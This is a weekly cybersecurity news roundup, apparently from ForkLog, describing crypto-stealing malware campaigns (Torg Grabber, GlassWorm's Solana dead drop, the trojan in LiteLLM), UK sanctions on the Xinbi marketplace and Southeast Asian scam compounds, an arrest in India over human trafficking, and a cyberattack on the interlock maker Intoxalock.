India arrests trafficker, Solana used as a dead drop, and other cybersecurity developments

We have gathered the week’s most important cybersecurity news.

Over 700 browser-based crypto wallets targeted by an info-stealer

The new Torg Grabber info-stealer targets sensitive data across 850 browser extensions, including crypto wallets, password managers, note-taking apps and two-factor authentication tools, report cybersecurity researchers at Gen Digital.

Initial access is achieved via the ClickFix technique: attackers hijack the clipboard and trick users into executing a malicious PowerShell command.

The list of targeted extensions includes 728 crypto wallets such as MetaMask, Phantom and Trust Wallet.

Torg Grabber also harvests data from Discord, Telegram, Steam, VPN tools, email services and desktop versions of crypto apps.

Beyond these features, the malware can:

• create a device fingerprint;
• enumerate installed software (including 24 antivirus tools);
• capture desktop screenshots;
• steal files from the Desktop and Documents folders;
• execute arbitrary code on the infected device.

Since late 2025, scammers have used a more resilient HTTPS connection via Cloudflare’s infrastructure. They also taught the stealer to bypass cookie protections in Chrome, Brave, Edge, Vivaldi and Opera.

According to researchers, 334 samples were compiled between December 2025 and February 2026, with new command-and-control servers registered weekly.

UK sanctions Xinbi and scam compounds in Southeast Asia

On 26 March, the UK government imposed sanctions on the crypto marketplace Xinbi and individuals linked to scam compounds in Southeast Asia.

Officials said the platform facilitates the sale of stolen personal data and provides tools to find victims, including satellite internet equipment. The measures restrict the network’s access to financial channels.

The sanctions also hit Legend Innovation, operator of #8Park — a large scam compound in Cambodia. Preliminary estimates suggest up to 20,000 forced labourers are held there. The firm’s director, Eang Soklim, and individuals tied to the Prince Group financial network were designated.

According to Chainalysis, more than $19.9bn in transactions flowed through Xinbi between 2021 and 2025.

In India, law enforcement arrested Sunil Nellatt Ramakrishnan, also known as Krish, on suspicion of trafficking people to fraudulent crypto centres in Myanmar.

Authorities say he was a key player in transporting victims from Delhi to Bangkok under the pretext of legal employment in Thailand. People were forcibly moved to the Myawaddy area, including the KK Park complex.

Searches at the suspect’s residence linked him to human-trafficking operations in Cambodia.

Malware used Solana to steal crypto data and phish

Cybersecurity firm Aikido observed a new phase of the GlassWorm campaign. Hackers distribute phishing code bundles that steal developer data and install a remote access trojan.

GlassWorm gains access via malicious packages published to developer repositories including npm, PyPI, GitHub and the Open VSX marketplace.

Its operators also compromise maintainers’ accounts on popular projects to push poisoned updates.

Rather than hard-coding the command server address (where it is easy to find and block), the hackers used a “dead drop” method and hid it on the Solana blockchain.

The loader connects to the network and checks preselected crypto wallets, looking for transactions with a memo field. Once found, it extracts the obfuscated link, decrypts it and connects to the remote server. The malware does not infect systems with a Russian locale.

The second stage of the attack includes:

• theft and collection of data, exfiltration of crypto wallets and system profiling;
• exfiltration. Collected data is compressed into a ZIP archive and sent to an external server;
• follow-on downloads. After exfiltration, the chain pulls two more components.

The first is a component for detecting USB devices. When a user connects a hardware wallet, a phishing window appears:

• for Ledger — a fake configuration error with 24 fields for entering the recovery phrase;
• for Trezor — a “firmware verification failure” message and forced emergency reboot with similar input fields.

The second component is a JavaScript RAT. Its download address is extracted from a Google Calendar event description (another “dead drop” method).

Its tasks include launching a covert remote desktop module, stealing browser data and executing arbitrary JavaScript.

In addition, the trojan forcibly installs the Google Docs Offline extension. It collects a tree of active tabs, up to 5,000 history entries, screenshots and clipboard contents. The extension also monitors crypto exchanges such as Bybit, tracking authorisation tokens and device IDs.

Cyberattack on an ignition interlock maker limited access to vehicles

Hackers attacked Intoxalock, a US supplier of vehicle ignition interlock systems. Disrupted devices left some owners unable to start their cars, the outlet “Хакер” reported.

Intoxalock makes devices that offenders convicted of drink-driving are required to install. To start the engine, a driver must blow into a tube to verify that blood alcohol content is below the legal limit; otherwise the car will not start. In some states the system also records GPS coordinates and routinely photographs the person at the wheel.

According to media reports, the device must be calibrated roughly once a month. Owing to the cyberattack, calibration proved impossible and drivers whose checks had expired were locked out. In Connecticut alone, the issue affected 7–10% of users.

The company extended service-centre authorisations by 10 days, though the grace period did not apply to all device versions or all states.

The system was restored on 22 March. Intoxalock’s management pledged to reimburse users’ expenses, including vehicle towing.

Researcher found a trojan in the LiteLLM AI app

Malware for stealing credentials was discovered in the popular LiteLLM AI application, reported Callum McMahon of FutureSearch.

LiteLLM lets developers connect to hundreds of different neural networks and manage subscription payments. The project has over 40,000 GitHub stars, thousands of forks, and daily downloads reach 3.4 million.

According to McMahon, the virus entered via a third-party software package on which LiteLLM depends. He suspected an infection when his computer suddenly shut down right after installing the software. A bug in the malware itself caused the crash, revealing the presence of the hacker’s code.

McMahon and noted developer Andrej Karpathy reached a shared conclusion: the virus was created through “vibe coding” without careful review.

How the malware worked:

• stole any credentials it could find;
• used them to access other accounts and packages to harvest yet more passwords;
• propagated along the chain, compromising additional systems.

TechCrunch noted that LiteLLM’s website displays badges for major security certifications SOC 2 and ISO 27001, issued after an audit by Delve. The firm bills itself as an AI-based service that automates cybersecurity compliance.

According to media reports, Delve had previously been accused of generating fake report data, using questionable auditors and misleading clients about their security posture.

See more

Oh damn, I thought this WAS a joke

… but no, LiteLLM *really* was “Secured by Delve” (the company that rubber stamped all of these audits, and seems to have been on the edge of fraudlent auditing, but useless for sure)

And so unspririsingly LiteLLM was compromised, badly https://t.co/P7FZrsagAb

— Gergely Orosz (@GergelyOrosz) March 24, 2026

LiteLLM’s developers mitigated the threat within hours of the tainted release appearing. The company has begun an investigation with Mandiant.

Also on ForkLog:

• Fenbushi Capital’s co-founder offered a bounty for the return of the stolen $42 million.
• ZachXBT accused Circle of mistakenly freezing 16 wallets.
• Irish authorities gained access to €30 million in bitcoin.
• A hack of Resolv crashed the USR stablecoin.
• Google identified a DarkSword exploit chain for hacking iPhones.

What to read this weekend?

In a new ForkLog feature, we explain how Russia’s authorities plan to monitor every crypto transaction inside the country and why bitcoin wallet keys may have to be shared with a digital depository.